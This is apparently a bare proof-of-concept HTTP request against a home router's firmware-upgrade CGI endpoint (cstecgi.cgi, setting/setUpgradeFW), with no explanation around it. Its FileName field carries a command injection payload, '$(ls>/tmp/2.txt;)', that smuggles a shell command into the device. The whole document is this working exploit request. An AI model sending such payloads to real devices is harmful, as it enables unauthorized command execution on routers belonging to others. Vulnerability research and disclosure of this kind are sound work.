POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.254
Content-Length: 111
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.254
Referer: http://192.168.0.254/adm/upload_firmware.asp?timestamp=1647873626299
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SESSION_ID=2:1647873425:2
Connection: close

{"topicurl":"setting/setUpgradeFW",
"FileName":"test1$(ls>/tmp/2.txt;)",
"ContentLength":"1",
"Flags":"1"
}